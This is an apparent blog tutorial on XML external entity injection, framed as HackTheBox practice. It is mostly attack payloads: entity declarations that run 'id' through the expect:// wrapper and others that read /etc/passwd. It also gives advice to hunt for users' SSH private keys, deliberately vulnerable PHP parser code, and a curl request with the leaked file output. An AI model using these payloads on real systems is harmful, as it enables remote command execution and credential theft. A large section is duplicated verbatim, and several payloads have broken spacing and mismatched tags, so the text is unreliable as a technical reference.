XML Injection
To practice we can play with Aragog & DevOops machines from HackTheBox. First of all, I want to mention that is neccessary to know the XML structure behinde it when interpreting the content, let me explain. Suppose that after uploading an XML file, the web shows us the following Output:User: zer0cool
Password: myPassword
This has been the case given that previously, in some way, we have been warned that the sub-tags to define in our XML file are User and Password, as well as a main creds tag that encompasses them. This allows us to carry out an attack like the one describe below.
Initially, we would be sending the following XML file:
<? xml version = "1.0" encoding = "ISO-8859-1"?>
<creds>
<User> zer0cool</user>
<Pass> myPassword </pass>
</creds>
Knowing therefore the structure, we could decide to send content like the following:
<? xml version = "1.0" encoding = "ISO-8859-1"?>
<! DOCTYPE foo [<! ELEMENT foo ANY>
<! ENTITY xxe SYSTEM "expect: // id">]>
<creds>
<User> & xxe; </user>
<Pass> myPassword </pass>
</creds>
When listing the Output from the web, we would find the following result:
User: www-data
Password: myPassword
This has been the case since we are playing with the expect wrapper. There are cases in which it may not be possible to execute commands in the system, in which case we could try to read file in the following way:
<? xml version = "1.0" encoding = "ISO-8859-1"?>
<! DOCTYPE foo [<! ELEMENT foo ANY>
<! ENTITY xxe SYSTEM "file: /// etc / passwd">]>
<creds>
<User> & xxe; </user>
<Pass> myPassword </pass>
</creds>
Where, as can be predicted, the User field will list the content of the /etc/passwd file. An idea here is to visualize if for some of the existing users based on the visualization of the resource previously seen, under the .ssh directory we can find a private access key through SSH to use it as an identification file, in this way... We would be able to access the system without prividing any password.
Another practical example as well as a way to do the same procedure is the following. Let's suppose an Apache service, this time we do not have the possibility to upload files, however we have the following structure behind:
<? php
libxml_disable_entity_loader (false);
$ xmlfile = file_get_contents ('php: // input');
$ dom = new DOMDocument ();
$ dom-> loadXML ($ xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$ creds = simplexml_import_dom ($ dom);
$ user = $ creds-> user;
$ pass = $ creds-> pass;
echo "You have logged in as user $ user";
?>
Password: myPassword
This has been the case given that previously, in some way, we have been warned that the sub-tags to define in our XML file are User and Password, as well as a main creds tag that encompasses them. This allows us to carry out an attack like the one describe below.
Initially, we would be sending the following XML file:
<creds>
<User> zer0cool</user>
<Pass> myPassword </pass>
</creds>
Knowing therefore the structure, we could decide to send content like the following:
<? xml version = "1.0" encoding = "ISO-8859-1"?>
<! DOCTYPE foo [<! ELEMENT foo ANY>
<! ENTITY xxe SYSTEM "expect: // id">]>
<creds>
<User> & xxe; </user>
<Pass> myPassword </pass>
</creds>
When listing the Output from the web, we would find the following result:
User: www-data
Password: myPassword
This has been the case since we are playing with the expect wrapper. There are cases in which it may not be possible to execute commands in the system, in which case we could try to read file in the following way:
<? xml version = "1.0" encoding = "ISO-8859-1"?>
<! DOCTYPE foo [<! ELEMENT foo ANY>
<! ENTITY xxe SYSTEM "file: /// etc / passwd">]>
<creds>
<User> & xxe; </user>
<Pass> myPassword </pass>
</creds>
Where, as can be predicted, the User field will list the content of the /etc/passwd file. An idea here is to visualize if for some of the existing users based on the visualization of the resource previously seen, under the .ssh directory we can find a private access key through SSH to use it as an identification file, in this way... We would be able to access the system without prividing any password.
Another practical example as well as a way to do the same procedure is the following. Let's suppose an Apache service, this time we do not have the possibility to upload files, however we have the following structure behind:
<? php
libxml_disable_entity_loader (false);
$ xmlfile = file_get_contents ('php: // input');
$ dom = new DOMDocument ();
$ dom-> loadXML ($ xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$ creds = simplexml_import_dom ($ dom);
$ user = $ creds-> user;
$ pass = $ creds-> pass;
echo "You have logged in as user $ user";
?>
Obviously, we are asked for an XML structure like the following:
<creds>
<user> Ed </user>
<pass> mypass </pass>
</creds>
In this case the request varies a bit, but we can do it from the terminal:
$ ~ curl -d @ xml.txt http: //localhost/xml_injectable.php
The concept at the end of the day is the same, the server responds the following:
You have logged in as user Ed And as a result of this, we can elaborate a malicious XML structure like the following:
<? xml version = "1.0" encoding = "ISO-8859-1"?>
<! DOCTYPE foo [<! ELEMENT foo ANY>
<! ENTITY xxe SYSTEM "file: /// etc / passwd">]>
<creds>
<user> & xxe; </user>
<pass> mypass </pass>
</creds>
What do we get with this? Get the following:
$~ curl -d @xml.txt http://localhost/xml_injectable.php
You have logged in as user root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
This is all, enjoy the content! ;)
Post a Comment
Comments here, cracks!